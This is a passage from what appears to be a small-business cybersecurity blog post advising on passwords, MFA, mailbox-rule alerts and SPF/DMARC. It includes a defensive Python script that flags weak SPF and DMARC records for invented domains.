But it doesn’t stop there. Education is an ongoing process and if we truly want to protect ourselves, learning shouldn’t be something we do once a year. So keep working on your cybersecurity knowledge. This could be through security training or simply through reading blogs like this. 

As we saw in the case above, weak authentication was the gateway to this attack. Using strong passwords is crucial. This can be achieved by using the three random words principle, as recommended by the NCSC.

On top of this, use multi-factor authentication (MFA). This attack, and others like it, could have been foiled with this extra layer of protection. 

Finally, it is worth speaking with your IT team to make sure they have implemented technical controls. This includes email filtering, to identify and block malicious content before it reaches you, as well as technologies such as SPF (Sender Policy Framework), which lists the servers allowed to send mail for your domain, and DMARC (Domain-based Message Authentication, Reporting, and Conformance), which tells receiving servers what to do with mail that fails authentication and reports spoofing attempts back to you. Note that SPF and DMARC stop others sending mail that pretends to come from your domain; they would not have caught the attack above, where the criminal was inside a legitimate account. For that, ask your IT team to alert on newly created mailbox rules that move, forward or delete mail.
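To see what a weak SPF or DMARC setting looks like in practice, here is an added Python checker (not from the original article) that reads a domain’s SPF and DMARC TXT records and flags settings that leave it spoofable: a permissive +all or ?all, a missing all mechanism, a DMARC policy of p=none, a partial pct, or no reporting address. The records and domains are constructed inline; in real use you would fetch them from DNS.

```python
"""Flag weak SPF and DMARC settings in a domain's TXT records.

Added example, not from the original article. Records are constructed inline
under invented domains; in real use you would fetch them from DNS.
"""
import re

# Mechanisms that cost a DNS lookup; RFC 7208 allows at most 10 per evaluation
DNS_MECHANISMS = {"include", "a", "mx", "ptr", "exists", "redirect"}


def _mechanism_name(term: str) -> str:
    """'include:_spf.example.net' -> 'include', '-all' -> 'all', 'a/24' -> 'a'."""
    return re.split(r"[:=/]", term.lstrip("+-~?").lower(), maxsplit=1)[0]


def check_spf(record: str) -> list:
    """Return findings for an SPF TXT record; an empty list means no concerns."""
    if not record:
        return ["no SPF record: receivers cannot tell which hosts may send as this domain"]
    terms = record.split()
    if terms[0].lower() != "v=spf1":
        return ["record does not begin with v=spf1, receivers will ignore it"]
    mechanisms = terms[1:]
    findings = []
    all_terms = [t for t in mechanisms if _mechanism_name(t) == "all"]
    if not all_terms:
        findings.append("no 'all' mechanism: unlisted senders get a neutral result")
    else:
        last = all_terms[-1]
        qualifier = last[0] if last[0] in "+-~?" else "+"   # default qualifier is pass
        if qualifier == "+":
            findings.append("'+all' authorises every host on the internet to send as you")
        elif qualifier == "?":
            findings.append("'?all' is neutral, the same as publishing no policy")
        if mechanisms.index(last) != len(mechanisms) - 1:
            findings.append("mechanisms after 'all' are never evaluated")
    if any(_mechanism_name(t) == "ptr" for t in mechanisms):
        findings.append("'ptr' is deprecated, slow and unreliable")
    # Top-level count only; mechanisms inside include'd records add to the real total
    lookups = sum(1 for t in mechanisms if _mechanism_name(t) in DNS_MECHANISMS)
    if lookups > 10:
        findings.append(f"{lookups} DNS-querying mechanisms exceed the limit of 10 (permerror)")
    return findings


def check_dmarc(record: str) -> list:
    """Return findings for a DMARC TXT record; an empty list means no concerns."""
    if not record:
        return ["no DMARC record: receivers get no policy for failed mail and you get no reports"]
    if not record.strip().lower().startswith("v=dmarc1"):
        return ["record does not begin with v=DMARC1, receivers will ignore it"]
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    policy = tags.get("p", "").lower()
    if policy not in ("none", "quarantine", "reject"):
        return ["missing or invalid 'p' tag, the record is unusable"]
    findings = []
    if policy == "none":
        findings.append("p=none only monitors: spoofed mail that fails checks is still delivered")
    if tags.get("sp", "").lower() == "none" and policy != "none":
        findings.append("sp=none leaves subdomains unprotected while the main domain is enforced")
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        pct = 100
        findings.append("pct is not a number")
    if pct < 100:
        findings.append(f"pct={pct}: the policy applies to only {pct}% of failing mail")
    if "rua" not in tags:
        findings.append("no rua address: you receive no aggregate reports showing who spoofs you")
    return findings


# Constructed records for invented domains
SAMPLE_RECORDS = {
    "weak.example": {"spf": "v=spf1 include:_spf.example.net +all",
                     "dmarc": "v=DMARC1; p=none; pct=50"},
    "good.example": {"spf": "v=spf1 ip4:203.0.113.0/24 include:_spf.example.net -all",
                     "dmarc": "v=DMARC1; p=reject; rua=mailto:dmarc@good.example; pct=100"},
    "none.example": {"spf": "", "dmarc": ""},
}


def assess(domain: str, records: dict = SAMPLE_RECORDS) -> dict:
    """Run both checks for one domain from the record table."""
    rec = records.get(domain, {})
    return {"spf": check_spf(rec.get("spf", "")), "dmarc": check_dmarc(rec.get("dmarc", ""))}


if __name__ == "__main__":
    for domain in SAMPLE_RECORDS:
        print(domain, assess(domain))
```

The ‘good’ records produce no findings; the ‘weak’ ones show the two mistakes that most often undo these controls in small businesses: an SPF record ending in +all, which authorises everyone, and a DMARC record left at p=none long after the monitoring period should have ended.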

Want to know more about the threats faced by small businesses like yours? Then check out our latest research report on how the cost of living crisis is impacting SMEs.
